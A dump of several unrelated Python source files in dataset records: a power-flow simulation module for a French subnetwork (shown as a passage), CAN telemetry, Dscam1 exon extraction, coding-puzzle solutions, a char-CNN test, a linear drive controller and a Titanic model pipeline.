beimulation consider ;\ndict_df_sgenLoad: dict \n Dictionary containing data (as dataframe i.e indexed by each period of \n the considered year) of the \n + df_prodHT => HT producers in the subnetwork \n + df_prod_bt_total => BT producers in the subnetwork\n + df_cons_total => Load demand subnetwork \nsum_max_main_network: tuple\n Sum of maximum power seen from the bigger network (here, saint laurent \n compared to the subnetwork civaux)\n + Of all BT energy producers => sum_max_input[0]\n + of all Load in the network => sum_max_input[1] \nnetwork_hv_activated_bus: list\n list of all Hv bus activated in the concerned network\nofp_status: Boolean = False\n Wether the maximum voltage is computed after a normal or optimal power flow or both\n + Normal => **pandapower.runpp(net)**, ofp_status = False\n + Optimal => **pandapower.runopp(net)**, ofp_status = True\n + Both => A normal power flow is run. Only when the result i.e. max_vm_pu > threshold, \n is the optimal power flow run.\n \n \n \"\"\"\n\n # Creating empty list \n list_max_vm_pu = [] # Maximum vm_pu at each period considered\n list_sgen_HT = [] # Actual HT generators power after optimal flow\n\n # Initiate parameters from inputs\n df_prodHT = dict_df_sgenLoad['df_prodHT']\n\n # Initialise the network and get the maximum value for each period\n for curr_period in tqdm(df_prodHT.index):\n\n if opf_status: # Run optimal power flow\n max_vm_pu, sgen_pw_HT = run_powerflow_at(network, curr_period,\n network_hv_activated_bus,\n sum_max_main_network,\n dict_df_sgenLoad, opf_status)\n list_max_vm_pu.append(max_vm_pu)\n list_sgen_HT.append(sgen_pw_HT)\n\n else: # Run simple power flow\n list_max_vm_pu.append(run_powerflow_at(network, curr_period,\n network_hv_activated_bus,\n sum_max_main_network,\n dict_df_sgenLoad, opf_status))\n\n # Return depends on ofp_status\n if opf_status:\n return list_max_vm_pu, list_sgen_HT\n else:\n return list_max_vm_pu\n\n\n\n\n\n# ___________________________________________________________________________________________________________________________________\n# ----------------------------------------------------------------------------------------------------------------------------------\n# ___________________________________________________________________________________________________________________________________\n\ndef run_powerflow_at(network: pandapower.auxiliary.pandapowerNet,\n curr_period: pandas._libs.tslibs.period,\n network_hv_activated_bus: list,\n sum_max_main_network: tuple,\n dict_df_sgenLoad: dict,\n auth_vm_pu_max=1.02,\n opf_status=False, \n pred_model=None):\n \"\"\"\nReturn the maximum voltage on the network for the period \n\nInitialise the parameters of the network\n\nParameters:\n----------\nnetwork: Pandapower network\n The network to beimulation consider ;\ncurr_period: Panda period\n The current period to investigate;\ndict_df_sgenLoad: dict \n Dictionary containing data (as dataframe i.e indexed by each period of \n the considered year) of the \n + df_prodHT => HT producers in the subnetwork \n + df_prod_bt_total => BT producers in the subnetwork\n + df_cons_total => Load demand subnetwork \nsum_max_main_network: tuple\n Sum of maximum power seen from the bigger network (here, saint laurent \n compared to the subnetwork civaux)\n + Of all BT energy producers => sum_max_input[0]\n + of all Load in the network => sum_max_input[1] \nnetwork_hv_activated_bus: list\n list of all Hv bus activated in the concerned network\nauth_vm_mu_max: Threshold of maximum voltage allowed on the network. Only used when the last\n input `ofp_status` is 'Both';\nofp_status: Boolean = False\n Wether the maximum voltage is computed after a normal or optimal power flow or both\n + Normal => **pandapower.runpp(net)**, ofp_status = False\n + Optimal => **pandapower.runopp(net)**, ofp_status = True\n + Both => A normal power flow is run. Only when the result i.e. max_vm_pu > threshold, \n is the optimal power flow run.\npred_model: String\n Which kind of prediction model to use for the all the variables to predict at current period\n + Pers => Persistence model i.e. val(k)= val(k-1)\n\n \n \n \"\"\"\n\n # Check variables congruence \n check_var_concordance(opf_status, pred_model) \n \n \n # -- GT1\n if pred_model == 'Pers': # if the the prediction model is the persistance,\n curr_period = curr_period-1\n \n \n # Initialize the network. See the corresponding function for more explanation\n initialize_network_at(network, curr_period,\n sum_max_main_network, dict_df_sgenLoad)\n\n # Get the maximum voltage magnitude of all activated bus to a list. See the \n # corresponding function for more explanation\n if opf_status == True: # Run optimal power flow *********************************************\n\n # get maximum value of vm_pu for the current period after optimal power flow\n cur_max_vm_pu = max_vm_pu_at(network, curr_period,\n network_hv_activated_bus,\n dict_df_sgenLoad, opf_status)\n\n # Get the value of HT producer after optimal flow. \n # HT producer results are in res_sgen.p_mw[21:]\n sgen_pw_HT = list(network.res_sgen.p_mw[21:])\n\n return cur_max_vm_pu, sgen_pw_HT\n\n elif opf_status == 'Both': # Run normal and depending on the situation, also optimal power flow *******\n # run normal power flow first \n cur_max_vm_pu = max_vm_pu_at(network, curr_period, network_hv_activated_bus,\n dict_df_sgenLoad, False)\n max_vm_pu_pf = cur_max_vm_pu # Save the maximum voltage given by the power flow \n # before optimizing\n # If the maximum voltage on buses is above the authorized threshold, run opf\n if cur_max_vm_pu > auth_vm_pu_max:\n cur_max_vm_pu = max_vm_pu_at(network, curr_period,\n network_hv_activated_bus,\n dict_df_sgenLoad, True)\n\n # Get the value of HT producer after optimal flow. \n # HT producer results are in res_sgen.p_mw[21:]\n sgen_pw_HT = list(network.res_sgen.p_mw[21:])\n\n # Depending on the prediction model parameter the return is different----------\n # For given that at GT1 the \n # one must reset curr_period to its initial value using \n # before ruturning the results\n if pred_model == 'Pers': return [max_vm_pu_pf, cur_max_vm_pu], sgen_pw_HT, curr_period+1\n else: return [max_vm_pu_pf, cur_max_vm_pu], sgen_pw_HT, curr_period\n\n elif opf_status == False : # Run normal power flow *******************************************************\n return max_vm_pu_at(network, curr_period, network_hv_activated_bus,\n dict_df_sgenLoad, opf_status)\n \n else : \n raise ValueError(' must be either of [True, False, ''Both'']' ) \n\n\n\n\n# ___________________________________________________________________________________________________________________________________\n# ----------------------------------------------------------------------------------------------------------------------------------\n# ___________________________________________________________________________________________________________________________________\n\ndef extract_par_results(parallel_result, df_prodHT):\n \"\"\"\nExtract and save the result of the parallel computation in a dataframe that is output\n\nParameters: \n--------------\nparallel_result: ipyparallel.client.asyncresult.AsyncMapResult\n Output given by dview.gather('var_name') where var_name is the name of the\n list comprehension used to run the parallel computing.\ndf_prodHT: Dataframe\n Dataframe containing data of all the HT producers in the network\n\n\nOutput:\n---------\nDataframe as:\n max_vm_pu : Maximum voltage recorded over all the bus at the instant given \n by the df.index\n Other columns : THe injected power of the respective HT producers.\n\n\n \"\"\"\n\n # Get all the elements from the parallel result in a list\n # elm[0] : Maximum voltage on all the line \n # elm[1][0]: Power injected into the network by the first HT producer \n # ...\n # elm[1][n]: Power injected into the network by the last HT producer i.e. P0100 \n # elm[2] : Period index associated to all the previous output variable\n\n # elm[0] can either be a list of [max_vm_pu_pf : max voltage before opf\n # max_vm_pu : maximum voltage after opf] \n # or a single float which is max_vm_pu : maximum voltage after opf. \n # See the function run_powerflow_at (*args, ofp_status='both', pred_model= 'Pers')\n if type(parallel_result[0][0]) is list: \n sep_list = [(*elm[0], *elm[1], elm[2]) for elm in parallel_result]\n # Create a colums using 'vm_pu_max' and add the HT producers name\n colls = ['max_vm_pu_pf', 'max_vm_pu'] + df_prodHT.columns.to_list()\n else:\n sep_list = [(elm[0], *elm[1], elm[2]) for elm in parallel_result]\n # Create a colums using 'vm_pu_max' and add the HT producers name\n colls = ['max_vm_pu'] + df_prodHT.columns.to_list()\n \n \n data_input = np.array(np.array(sep_list)[:, :-1], dtype=float)\n index_list = np.array(sep_list)[:, -1]\n\n # create new dataframe based on previous unpack data\n df = pd.DataFrame(data=data_input, index=index_list, columns=colls)\n\n # return the newly create dataFrame with the index sorted \n return df.sort_index()\n\n\n\n\n\n# ___________________________________________________________________________________________________________________________________\n# ----------------------------------------------------------------------------------------------------------------------------------\n# ___________________________________________________________________________________________________________________________________\n\ndef check_var_concordance(opf_status=False, pred_model=None):\n \"\"\"\nCheck the congruence between the optimal power flow variable and the type of prediction model.\n\nParameters:\n----------\nofp_status: Boolean = False\n Wether the maximum voltage is computed after a normal or optimal power flow or both\n + Normal => **pandapower.runpp(net)**, ofp_status = False\n + Optimal => **pandapower.runopp(net)**, ofp_status = True\n + Both => A normal power flow is run. Only when the result i.e. max_vm_pu > threshold, \n is the optimal power flow run.\npred_model: String\n Which kind of prediction model to use for the all the variables to predict at current period\n + Pers => Persistence model i.e. val(k)= val(k-1)\n\n \n \"\"\"\n \n pred_model_values = ['Pers']\n \n # If the prediction model is defined, make sure that the ='Both'\n if(pred_model is not None):\n if pred_model not in pred_model_values: # chef if the pred_model value is an authorised\n raise ValueError(' must be either of', pred_model_values ) \n \n if opf_status != 'Both': # \n raise ValueError('Given that is defined, must be set to <\\'Both\\'> ')\n\n \n \n \n \n# ___________________________________________________________________________________________________________________________________\n# ----------------------------------------------------------------------------------------------------------------------------------\n# ___________________________________________________________________________________________________________________________________ \n \ndef improve_persinstence(per_extracted_res_df: pandas.core.frame.DataFrame, \n prodHT_df: pandas.core.frame.DataFrame,\n auth_vm_mu_max: float, \n h_start_end = ['11:00','14:00']):\n# Implement : * Inject all the production as long as max_vm_pu_pf < vm_mu_max, i.e. \n# no voltage rise is detected \n \"\"\"\nImprove the results given by the persistence model. If a voltage rise is not predicted by \nthe persistence model at a certain period, the controllable sgens is allowed to inject all \nits power into the grid. Otherwise the energy producer can inject at most the predicted power \nby the persistence model. \n\n\nParameters\n----------\nper_extracted_res_df: dataframe\n Result given by the persistence model. \n Output of <sig_thresh).astype(int) # convert prediction into a binary variablethe prediction\n \n # Return the prediction of the RNN and the time period associated ()\n return pred_bin[0][0], history_last_ind+1\n\n\n\n\n\n\n# ___________________________________________________________________________________________________________________________________\n# ----------------------------------------------------------------------------------------------------------------------------------\n# ___________________________________________________________________________________________________________________________________ \ndef robustPred(model_Vrise_dict, P0100_no_control, P0100_opt_model1, auth_vm_mu_max, n_models=None ):\n \"\"\"\nDefine Robust prediction bloc: \n\n\nPrameters:\n--------------\nmodel_Vrise_dict: Dict\n Dictionary of the voltage rise for each model \nP0100_no_control : pandas dataframe\n Values of the controlled Generator P0100 when no controled is applied\nP0100_opt_model1 : pandas Dataframe. Partial output of function <>\n Optimal value of P0100 at the end of bloc PF/OPF of model1. This is the \n command value to send to the said producer when the robustPred \n predicts a voltage rise above the threshold vm_mu_max.\nauth_vm_mu_max: Threshold of maximum voltage on the network\nn_models: Int or string\n Int: Number of models which must agree on voltage rise above threshold before\n a command is set to P0100\n ** 1: At Least one of the models\n ** 2: At least two of the models\n ** 3: All three models\n String: \n Name of the Model which voltage rise above threshold prediction is considered\n 'Modelx' where x in {1,2,3}\n \n\nOutput: \n---------\nnew_p0100_df: panda dataframe\n y_optimal after combined model\n \n \"\"\"\n \n\n # Extract model voltage rise from Input dictionary \n model1_Vrise, model2_Vrise, model3_Vrise = (model_Vrise_dict['Model1'], \n model_Vrise_dict['Model2'], \n model_Vrise_dict['Model3'])\n \n mask_per2work = model1_Vrise.index # Get index of the considered period\n vect_int = np.vectorize(int) # vectorized version of int\n\n # Create an empty dataframe i.e. binary threshold \n bin_thresh_df = pd.DataFrame(index=mask_per2work)\n\n # add the binary output of three models to the created df\n bin_thresh_df[['Model3']] = model3_Vrise.values\n bin_thresh_df[['Model2']] = vect_int(model2_Vrise>auth_vm_mu_max)\n bin_thresh_df[['Model1']] = vect_int(model1_Vrise>auth_vm_mu_max)\n\n # Combined_output of all models\n bin_thresh_df[['Model_All']] = np.array(bin_thresh_df.sum(axis=1)).reshape((-1,1))\n\n \n # Create a new dataframe for the controlled SGEN based on its real values \n new_p0100_df = P0100_no_control.loc[mask_per2work, ['P0100']]\n\n \n if type(n_models) is str :# If n_model is a string\n if n_models in model_Vrise_dict.keys(): # Check if the sting input is in the model Dict\n vrise_true_mask = bin_thresh_df[n_models] == 1 # Create the mask using only the \n # period where the concerned model predict there is an voltage rise\n else: raise ValueError('Since is a string it must be be either of', list(model_Vrise_dict.keys())) \n \n elif type(n_models) is int: # If n_model is int \n if n_models <= 3:\n # Create mask of instants where at least n models agrees on voltage rise above threshold \n vrise_true_mask = bin_thresh_df.Model_All>= n_models \n else: raise ValueError('Since is an int it must be defined such that 0 < n_models <= 3 ')\n \n else: raise ValueError(' is the wrong type. Must either be an int or a string')\n\n # Use vrise_true_mask to insert predicted values given by model1 at the concerned instants \n new_p0100_df[vrise_true_mask] = P0100_opt_model1.loc[mask_per2work].loc[vrise_true_mask, ['P0100']]\n \n return new_p0100_df, bin_thresh_df\n\n\n","repo_name":"pajjaecat/Saint_Laurent_De_Jourdes","sub_path":"py_files/myFunctions.py","file_name":"myFunctions.py","file_ext":"py","file_size_in_byte":31998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15631712331","text":"from typing import cast\nfrom time import sleep\nfrom threading import Thread, Lock\nfrom pathlib import Path\nfrom copy import deepcopy\n\nimport can\nimport cantools.database\nfrom cantools.database.can.database import Database\nfrom cantools.typechecking import SignalDictType\nfrom digi.xbee.devices import XBeeDevice\n\nfrom src import ROOT_DIR, BUFFERED_XBEE_MSG_END\nfrom src.can.row import Row\nfrom src.util import add_dbc_file, find, unwrap\n\nimport src.car_gui as car_display\nimport src.can_db as can_db\n\nVIRTUAL_BUS_NAME = \"virtbus\"\n\nPORT = \"/dev/ttyUSB0\"\nBAUD_RATE = 9600\nREMOTE_NODE_ID = \"Node\"\n\nxbee = None\nremote = None\nstore_data = False\nshould_send = False\nshould_display = True\n\n# Thread communication globals\nrow_lock = Lock()\n\n# The database used for parsing with cantools\ndb = cast(Database, cantools.database.load_file(Path(ROOT_DIR).joinpath(\"resources\", \"mppt.dbc\")))\nadd_dbc_file(db, Path(ROOT_DIR).joinpath(\"resources\", \"motor_controller.dbc\"))\nadd_dbc_file(db, Path(ROOT_DIR).joinpath(\"resources\", \"bms_altered.dbc\"))\n\nif store_data:\n # Connection\n conn = can_db.connect(\"can_sending_db\")\n\nif store_data:\n # Connection\n conn = can_db.connect(\"can_sending_db\")\n\n# The rows that will be added to the database\nrows = [Row(db, node.name) for node in db.nodes]\n\ndef get_packets(interface) -> iter:\n \"\"\"Generates CAN Packets.\"\"\"\n if interface == 'canusb':\n with serial.Serial(SERIAL_PORT, SERIAL_BAUD_RATE) as receiver:\n while(True):\n raw = receiver.read_until(b';').decode()\n if len(raw) != 23: continue\n raw = raw[1:len(raw) - 1]\n raw = raw.replace('S', '')\n raw = raw.replace('N', '')\n tag = int(raw[0:3], 16)\n data = bytearray.fromhex(raw[3:])\n sleep(.1)\n yield can.Message(arbitration_id=tag, data=data)\n elif interface == 'pican':\n with can.interface.Bus(channel='can0', bustype='socketcan') as bus:\n for msg in bus:\n tag = msg.arbitration_id\n data = msg.data\n yield can.Message(arbitration_id=tag, data=data)\n else:\n raise Exception('Invalid interface')\n\ndef row_accumulator_worker(bus: can.ThreadSafeBus):\n global car_display\n \"\"\"\n Observes messages sent on the `bus` and accumulates them in a global row.\n \"\"\"\n for msg in get_packets(\"pican\"):\n assert msg is not None\n\n row = find(rows, lambda r: r.owns(msg, db))\n if row is not None:\n row = unwrap(row)\n\n # i = next(i for i, r in enumerate(rows) if r.owns(msg, db))\n decoded = cast(SignalDictType, db.decode_message(msg.arbitration_id, msg.data))\n with row_lock:\n for k, v in decoded.items():\n row.signals[k].update(v)\n if k in car_display.displayables.keys():\n car_display.displayables[k] = v\n # print(car_display.displayables)\n\n \n # decoded = cast(SignalDictType, db.decode_message(msg.arbitration_id, msg.data))\n # with row_lock:\n # for k, v in decoded.items():\n # rows[i].signals[k].update(v)\n\n\n# TODO: Buffering sucks. Get rid of the need for this (with more space-efficient serialization).\ndef buffered_payload(payload: str, chunk_size: int = 256, terminator: str = BUFFERED_XBEE_MSG_END) -> list[str]:\n payload += terminator\n return [payload[i:i + chunk_size] for i in range(0, len(payload), chunk_size)]\n\ndef sender_worker():\n \"\"\"\n Serializes rows into the queue.\n \"\"\"\n while True:\n sleep(2.0)\n with row_lock:\n copied = deepcopy(rows)\n for row in copied:\n row.stamp()\n if store_data:\n can_db.add_row(conn, row.timestamp, row.signals.values(), row.name)\n for chunk in buffered_payload(row.serialize()):\n print(chunk)\n print(\"\\n\")\n if should_send:\n xbee.send_data(remote, chunk)\n\ndef startXbee():\n global xbee, remote\n xbee = XBeeDevice(PORT, BAUD_RATE)\n xbee.open()\n\n remote = xbee.get_network().discover_device(REMOTE_NODE_ID)\n assert remote is not None\n\n\n#displays the car gui, receives can data, stores it, and sends it over the xbees\nif __name__ == \"__main__\":\n if should_send:\n startXbee()\n if store_data:\n for row in rows:\n can_db.create_tables(conn, row.name, row.signals.items())\n print(\"ready to receive\")\n # Start the bus\n # Create a thread to read of the bus and maintain the rows\n accumulator = Thread(target=row_accumulator_worker,\n args=(can.ThreadSafeBus(channel='can0', bustype='socketcan'),),\n daemon=True)\n\n # # Create a thread to serialize rows as would be necessary with XBees\n sender = Thread(target=sender_worker, daemon=True)\n\n # Start the threads\n accumulator.start()\n sender.start()\n\n #display\n if should_display:\n root = car_display.CarDisplay()\n root.mainloop()\n\n # Spin forever.\n while True: ...\n","repo_name":"nusolar/SC7s","sub_path":"telemetry-python/scripts/CAN_Display.py","file_name":"CAN_Display.py","file_ext":"py","file_size_in_byte":5192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73955213928","text":"#!/usr/bin/env python\n\n# Script: \"11-16_get-all-dscam-exons.py\"\n# (specific ~one-time use)\n# Requires: Python 3\n# Purpose: Sensibly extract a BED record per Dscam1 exon in the 75 Dscam1\n# transcripts found in the Ensembl Dme v89 annotation.\n# Usage: 11-16_get-all-dscam-exons.py Drosophila_melanogaster.BDGP6.89.gtf\n# Author: Matthew Bauer\n\nimport sys\n\ndef process_gtf_record(rec):\n \"\"\"Extract relevant information from the given GTF record.\"\"\"\n fields = rec.split('\\t')\n info = {}\n info['chr'] = fields[0]\n info['feature'] = fields[2]\n info['start'] = int(fields[3])-1 # conv to 0-based\n info['end'] = int(fields[4]) # no conversion needed\n for attr in fields[8].split(';'):\n attr = attr.strip()\n if attr:\n parts = attr.split(' ')\n info[parts[0]] = parts[1].strip('\"')\n return info\n\nexons = [[] for _ in range(25)]\n# extract info from file\nwith open(sys.argv[1]) as fin:\n for line in fin:\n line = line.rstrip()\n if (not line) or line.startswith('#!'):\n continue\n info = process_gtf_record(line)\n if (info['gene_name'] == 'Dscam1' and info['feature'] == 'exon'):\n interval = (info['start'], info['end'])\n exon_num = int(info['exon_number'])\n if interval not in exons[exon_num]:\n exons[exon_num].append(interval)\n# sort all the intervals\nfor intvls in exons:\n intvls.sort(key=lambda i: i[0])\n# write BED records for them\nfor exon_num, exon_vers in enumerate(exons):\n for ver_num, ver in enumerate(exon_vers):\n sys.stdout.write(\n '2R\\t{start}\\t{end}\\t{exon}.{ver}\\n'.format(\n start=ver[0], end=ver[1], exon=exon_num, ver=ver_num+1))\n","repo_name":"bauersmatthew/cybio","sub_path":"specific/11-16_get-all-dscam-exons.py","file_name":"11-16_get-all-dscam-exons.py","file_ext":"py","file_size_in_byte":1740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26465456094","text":"import string\n\n\nclass Solution:\n def sortLetters(self, chars):\n left, right = 0, len(chars) - 1\n while left <= right:\n while left <= right and str(chars[left]).islower():\n left += 1\n while left <= right and str(chars[right]).isupper():\n right -= 1\n if left < right:\n temp = chars[left]\n chars = chars[:left] + chars[right] + chars[left + 1:]\n chars = chars[:right] + temp + chars[right + 1:]\n left += 1\n right -= 1\n print(chars)\n\n\nchars = 'Ca'\ns = Solution()\ns.sortLetters(chars)\n","repo_name":"sassyst/leetcode-python","sub_path":"lintcode/TwoPointers/SortLettersByCase.py","file_name":"SortLettersByCase.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22187923006","text":"import os\nimport unittest\n\nfrom src.data.load_data import load_csv, batch_iter\nfrom src.data.preprocess_data import Preprocessor\nfrom src.models.char_cnn.model import build_model\nfrom src.models.char_cnn.config import ModelConfig, TrainingConfig\n\nfrom keras.optimizers import Adam\n\n\nclass TestCharCNN(unittest.TestCase):\n\n def setUp(self):\n self.filename = os.path.join(os.path.dirname(__file__), 'data/test.csv')\n\n def test_train(self):\n X_train, y_train = load_csv(self.filename)\n X_valid, y_valid = load_csv(self.filename)\n p = Preprocessor()\n p.fit(X_train, y_train)\n model_config = ModelConfig(vocab_size=len(p.vocab), nb_class=len(p.classes))\n training_config = TrainingConfig()\n train_batches, train_steps = batch_iter(X_train, y_train, training_config.batch_size, p)\n valid_batches, valid_steps = batch_iter(X_valid, y_valid, training_config.batch_size, p)\n\n model = build_model(model_config.kernel_sizes,\n model_config.dense_units,\n model_config.vocab_size,\n model_config.nb_filter,\n model_config.nb_class,\n model_config.keep_prob,\n model_config.maxlen)\n model.compile(loss='categorical_crossentropy',\n optimizer=Adam(),\n metrics=['accuracy'])\n model.fit_generator(generator=train_batches,\n steps_per_epoch=train_steps,\n validation_data=valid_batches,\n validation_steps=valid_steps,\n epochs=training_config.max_epoch)\n","repo_name":"Hironsan/awesome-text-classification","sub_path":"tests/test_char_cnn.py","file_name":"test_char_cnn.py","file_ext":"py","file_size_in_byte":1729,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"53"} +{"seq_id":"7072845219","text":"# Contest No.: 632\n# Problem No.: C\n# Solver: JEMINI\n# Date: 20200409\n\nimport sys\n\ndef main():\n n = int(input())\n nums = list(map(int, sys.stdin.readline().split()))\n ans = 0\n invalidRange = []\n for i in range(n - 1):\n for j in range(nums):\n if nums[i] != 0:\n ans += 1\n else:\n invalidRange.append((j, j + i))\n \n print(ans)\n return\n\nif __name__ == \"__main__\":\n main()","repo_name":"Jinmin-Goh/Codeforces","sub_path":"#632_Div_2/C.py","file_name":"C.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6575448041","text":"t = int(input())\nwhile t > 0:\n t-=1\n s = str(input())\n sum = 0\n b = []\n for i in range(len(s)):\n if(s[i] >= '0' and s[i] <= '9'):\n sum += (ord(s[i])-48)\n else:\n b.append(s[i])\n b.sort()\n for i in b:\n print(i, end='')\n print(sum)","repo_name":"bakachanbaby/code_ptit","sub_path":"tinh_tong_cac_chu_so.py","file_name":"tinh_tong_cac_chu_so.py","file_ext":"py","file_size_in_byte":295,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"14859461788","text":"\"\"\"\nThis module contains the class LinearDrive, an abstraction layer over linear\ndrives built upon technosoft servos.\n\"\"\"\nimport math\nimport time\nimport struct\n\nimport serial as s\n\nfrom technosoftlineardrive.assemblyprogram import create_linear_drive_program\n\n# Constants\nTRANSFER_OK = 79\nTRANSFER_BAD = 13\nSYNC_DATA = 13\nSYNC_OK = 13\nMAX_RESYNC_ATTEMPTS = 10\nUNITS_PER_MM = 167.52\nUNITS_PER_MM_PER_S = 0.16752\nUNITS_PER_MM_PER_S_SQUARED = 0.00016752\nRAIL_LENGTH = 744.0 # mm\n\nRESET_SPEED = 74 # mm/s\nRESET_DISTANCE = 800 # mm\n\ndef assert_numerical(x):\n \"\"\"\n Assert that a number is numeric. Throws an exception otherwise.\n \n :param x: object to check.\n \"\"\"\n if not (type(x) is float or type(x) is int):\n raise Exception(\"LinearDrive was given a non-numerical value. Please send an int or a float.\")\n\nclass LinearDrive:\n \"\"\"\n Abstraction layer over a linear drive built upon technosoft servos.\n \n :Example:\n\n >>> ld = LinearDrive()\n >>> ld.goto_position(500)\n\n \"\"\"\n def __init__(self, device_path='/dev/ttyUSB0'):\n \"\"\"\n Constructor for the Linear Drive.\n \n :param device_path: serial device to use\n \"\"\"\n self.device = s.Serial(device_path,\n 115200,\n timeout=1.0)\n self.__current_position = 0\n self.speed = 200 # mm/s\n self.acceleration = 500 # mm/s^2\n self.reset_position()\n\n def __calculate_movement_time(self, distance):\n distance /= UNITS_PER_MM\n accel_time = self.speed / self.acceleration\n accel_dist = self.acceleration * (accel_time**2.0) / 2\n return 2*accel_time + (abs(distance) - 2*accel_dist)/self.speed\n\n def __send_data(self, data):\n for line in data:\n self.__send_data_line(line)\n\n\n def __send_data_line(self, data):\n data_package = struct.pack(\"\")\n for byte in data:\n data_package += struct.pack(\"B\", byte)\n\n # Send data package\n send = lambda: self.device.write(data_package)\n send()\n while self.__transfer_response() != TRANSFER_OK:\n self.__sync()\n send()\n\n\n def __sync(self):\n for _ in range(MAX_RESYNC_ATTEMPTS):\n self.device.write(struct.pack(\"B\", SYNC_DATA))\n time.sleep(0.1)\n if self.__transfer_response() == SYNC_OK:\n return True\n\n raise Exception(\"Could not resync to linear drive\")\n\n def __transfer_response(self):\n return struct.unpack(\"B\", self.device.read(1))[0]\n\n def __move_to_unit_position(self, desired_position):\n move_amount = desired_position - self.__current_position\n self.__current_position = desired_position\n self.__move(move_amount)\n return self.__calculate_movement_time(move_amount)\n\n def __move(self, move_amount):\n speed = self.speed * UNITS_PER_MM_PER_S\n acceleration = self.acceleration * UNITS_PER_MM_PER_S_SQUARED\n self.__send_data(create_linear_drive_program(-move_amount,\n acceleration=acceleration,\n speed=speed))\n def set_speed(self, speed):\n \"\"\"\n Set the speed of the linear drives movement in millimeters per second.\n \n :param speed: to move the linear drive with. \n \"\"\"\n assert_numerical(speed)\n if speed <= 0:\n raise Exception(\"LinearDrive cannot do non-positive speeds.\")\n self.speed = speed\n\n def get_speed(self):\n \"\"\"\n Get the currently set speed of the linear drive in millimeters per second.\n \n :return speed: the linear drive is set to move with.\n \"\"\"\n \n return self.speed\n\n def reset_position(self):\n \"\"\"\n Reset the linear drive to it's zero position. This will move the linear\n drive to the leftmost position and reset the internal counter.\n\n :return seconds: The number of seconds until it's safe to assume the\n camera has been reset.\n\n \"\"\"\n # Set a separate reset speed to increase accuracy.\n pre_reset_speed = self.speed\n self.speed = RESET_SPEED\n\n self.__move(math.floor(-RESET_DISTANCE*UNITS_PER_MM)) # Move to negative max\n self.__current_position = 0\n\n maximum_time = self.__calculate_movement_time(RESET_DISTANCE*UNITS_PER_MM)\n\n self.speed = pre_reset_speed\n return maximum_time\n\n def goto_position(self, position):\n \"\"\"\n Move the linear drive to the specified position. The position is specified\n in millimeters.\n\n :param position: to move linear drive to.\n :return time: it will take to move to position.\n \"\"\"\n assert_numerical(position)\n position = min(position, RAIL_LENGTH)\n position = max(position, 0)\n position = math.floor(position * UNITS_PER_MM)\n return self.__move_to_unit_position(position)\n\n def goto_relative_position(self, position):\n \"\"\"\n Move the linear drive to a position relative the current position. Distance\n is given in millimeters.\n\n :param position: to move from current position.\n :return time: it will take to move to position.\n \"\"\"\n assert_numerical(position)\n return self.goto_position(self.get_current_position() + position)\n\n\n def get_current_position(self):\n \"\"\"\n Return the current position of the linear drive. The position is given in\n millimeters from the linear drives leftmost position.\n \n :return postition: of the linear drive. \n \"\"\"\n return self.__current_position / UNITS_PER_MM\n\n","repo_name":"PUM-9/TreeD","sub_path":"technosoft-linear-drive/src/technosoftlineardrive/lineardrive.py","file_name":"lineardrive.py","file_ext":"py","file_size_in_byte":5747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8758905005","text":"\nfrom semi_auto_ml.utils.extract_funcs import save_sk_model,load_sk_model\nfrom sklearn.pipeline import Pipeline\nimport os\n\nclass ModelDeploy():\n '''\n save tratnsform and predict model,not contain feature_tools\n '''\n @staticmethod\n def save_model(model_path:tuple,save_path):\n '''\n save all model to file,except feature_tools\n '''\n for ind,item in enumerate(model_path):\n file_path = save_path+f'{ind}_m.joblib'\n if hasattr(item,'save'):\n item.save(file_path)\n else:\n save_sk_model(item,file_path)\n\n @staticmethod\n def load_model(save_path):\n '''\n from save_path load all joblib table,and generate pipeline by name\n '''\n pips = []\n models = sorted([ml for ml in os.listdir(save_path) if ml.endswith('joblib')],key=lambda x:int(x[0]))\n for ind,item in enumerate(models):\n file_path = save_path+item\n clf = load_sk_model(file_path)\n pips.append((f'{ind}_m',clf))\n return Pipeline(pips)\n\n\n","repo_name":"lphcreat/semi_auto_ml","sub_path":"semi_auto_ml/model_deploy.py","file_name":"model_deploy.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24831587649","text":"# 0. Load required modules:\nimport os\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.impute import SimpleImputer # Imputation Transformer\nfrom sklearn.preprocessing import OrdinalEncoder, StandardScaler # Encoding Transformers\nfrom sklearn.compose import ColumnTransformer\nfrom lightgbm import LGBMClassifier\nimport pickle\nimport numpy as np\nfrom google.cloud import storage\n\n# 1. Dataset preparation\ndf = pd.read_csv(\"https://raw.githubusercontent.com/pankajrsingla/vertexai_ml6/main/data/titanic.csv\")\n\nFEATURES = ['Pclass', 'Sex', 'Age', 'Fare', 'Embarked']\nTARGET = 'Survived'\ntrain_df, test_df = train_test_split(df, train_size=0.7,\n shuffle=True, random_state=42)\nX_train, y_train = train_df[FEATURES], train_df[TARGET]\nX_test, y_test = test_df[FEATURES], test_df[TARGET]\n\n# 2. Data preprocessing\nnumerical_features = ['Age', 'Fare', 'Pclass']\ncategorical_features = ['Sex', 'Embarked']\n\n# 2.1 Creating a preprocessing pipeline\n\n# 2.1.1 Defining the categorical pipeline\n# steps of the pipeline have the form: ('name', TransformerObject)\n# handle_unknown in OrdinalEncoder is required for Vertex AI predictions.\ncategorical_pipe = Pipeline(steps=[\n ('imputer', SimpleImputer(strategy='most_frequent')),\n ('encoder', OrdinalEncoder(categories='auto', handle_unknown='use_encoded_value', unknown_value = np.nan))\n])\n\n# 2.1.2 Defining the numerical pipeline\nnumerical_pipe = Pipeline(steps=[\n ('imputer', SimpleImputer(strategy='mean')),\n 